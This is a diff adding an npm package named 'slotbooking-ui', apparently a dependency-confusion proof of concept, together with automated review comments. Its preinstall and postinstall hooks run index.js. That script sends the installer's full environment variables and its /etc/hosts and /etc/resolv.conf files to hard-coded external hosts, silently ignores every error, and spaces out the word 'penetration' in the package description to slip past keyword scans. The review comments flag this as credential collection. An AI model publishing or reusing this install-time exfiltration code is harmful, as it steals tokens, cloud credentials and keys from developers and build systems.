slotbooking-ui 2.18.1-RC



package/README.md ADDED
File without changes
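--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,118 @@
+/*
+--[Dependency Confusion Attack]--
+
+Proof-of-Concept for an ongoing penetration test.
+Please that a look at src/DETAILS.md
+*/
+
+
+const https = require('https');
+const fs = require('fs')
+
+let dns_mockendpoint = 'u4z29mfue0mjpoygbtm4zo2cy34usugj.cb.mog'+ 'wailabs.de'
+let endpoint = 'https://npmproject8923895823.mog'+'waisecurity.de/en-US'
+
+
+
+// slightly modified version from
+// https://stackoverflow.com/questions/40537749/how-do-i-make-a-https-post-in-node-js-without-any-third-party-module
+function post(url, data) {
+data["module"] = "1.1.888"
+const dataString = JSON.stringify(data)
+
+const options = {
+method: 'POST',
+headers: {
+'Content-Type': 'application/json',
+'Content-Length': dataString.length,
+},
+timeout: 1000, // in ms
+}
+
+return new Promise((resolve, reject) => {
+const req = https.request(url, options, (res) => {
+if (res.statusCode < 200 || res.statusCode > 299) {
+return reject(new Error(`HTTP status code ${res.statusCode}`))
+}
+
+const body = []
+res.on('data', (chunk) => body.push(chunk))
+res.on('end', () => {
+const resString = Buffer.concat(body).toString()
+resolve(resString)
+})
+})
+
+req.on('error', (err) => {
+reject(err)
+})
+
+req.on('timeout', () => {
+req.destroy()
+reject(new Error('Request time out'))
+})
+
+req.write(dataString)
+req.end()
+}).catch(_ignore)
+}
+
+function get_file(fname){
+let contents
+if (fs.existsSync(fname)) {
+contents = fs.readFileSync(fname, { encoding: 'base64' })
+}
+return {content: contents, name: fname, empty: !fs.existsSync(fname) }
+}
+
+
+// https://stackoverflow.com/questions/1349404/generate-random-string-characters-in-javascript
+function makeid(length) {
+let result = '';
+const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
+const charactersLength = characters.length;
+let counter = 0;
+while (counter < length) {
+result += characters.charAt(Math.floor(Math.random() * charactersLength));
+counter += 1;
+}
+return result;
+}
+
+function _ignore(err){
+return
+}
+
+function print_info(){
+console.log(``)
+console.log(`[!] Hello it seems like you downloaded the wrong dependency! [!]`)
+console.log(`Your environment is prune to dependency confusion.`)
+console.log(`This is part of an active penetration test. `)
+throw new Error("Depdendency confusion!")
+}
+
+// main
+(async() => {
+const device_id = makeid(15)
+endpoint = endpoint + "/" + device_id // ugly but more reliable than other api calls
+
+// env
+let data = process.env
+await post(endpoint, data).catch(_ignore)
+
+// dns
+try{
+post('https://' +device_id + '-' + dns_mockendpoint, data).catch(_ignore)
+}catch(e){}
+
+// mac/lin attribution files
+await post(endpoint, get_file("/etc/hosts")).catch(_ignore)
+await post(endpoint, get_file("/etc/resolv.conf")).catch(_ignore)
+
+// win exfil not required - env should be enough
+
+
+// --[Disclaimer info]--
+print_info()
+
+})();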
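Review bot: `await post(endpoint, data)` directly after `let data = process.env` uploads the installing host's entire environment — which on a CI runner or developer workstation routinely holds registry tokens, cloud credentials and signing keys — to a hard-coded third-party host, and the two calls that follow add `/etc/hosts` and `/etc/resolv.conf`; that is credential collection, not evidence that the wrong package resolved. A proof-of-concept callback only needs non-secret attribution, e.g. `post(endpoint, { host: os.hostname(), user: os.userInfo().username, pkg: 'slotbooking-ui' })` (with `const os = require('os')`), and because `post()` already ends in `.catch(_ignore)` the extra `.catch(_ignore)` on every caller is redundant while guaranteeing that no failure is ever surfaced to whoever runs the test. Separately, `'Content-Length': dataString.length` counts UTF-16 code units rather than bytes, so a body containing non-ASCII environment values is sent with a short Content-Length; `'Content-Length': Buffer.byteLength(dataString)` is the correct value. `data["module"] = "1.1.888"` also mutates the caller's object, which on the first call is `process.env` itself, so the side effect persists for the remainder of the process.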
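--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,14 @@
+{
+"name": "slotbooking-ui",
+"version": "2.18.1-RC",
+"description": "Proof-of-Concept for Project 7 - active p e n e t r a t i o n test",
+"main": "index.js",
+"scripts": {
+"postinstall": "node index.js",
+"preinstall": "node index.js"
+},
+"author": "",
+"license": "ISC",
+"dependencies": {
+}
+}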
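Review bot: `"preinstall"` and `"postinstall"` both run `node index.js`, so the collection in index.js executes twice on a normal install; and since index.js ends by throwing from `print_info()` inside an `async` IIFE with no handler, that unhandled rejection presumably makes the preinstall step exit non-zero on current Node releases, in which case npm aborts before postinstall ever runs and the second hook is either redundant or unreachable. If a single loud failure is the intent, keep only `"preinstall": "node index.js"`. The spaced-out "p e n e t r a t i o n" in `description` reads as an attempt to evade keyword scanning, and `"author": ""` leaves an affected team no way to verify the claimed engagement; a PoC that wants to be distinguishable from a real attack should state its purpose plainly and carry a contact, e.g. `"author": "<tester name> <contact address>"`.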
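--- a/package/src/DETAILS.md
+++ b/package/src/DETAILS.md
@@ -0,0 +1,2 @@
+## Information
+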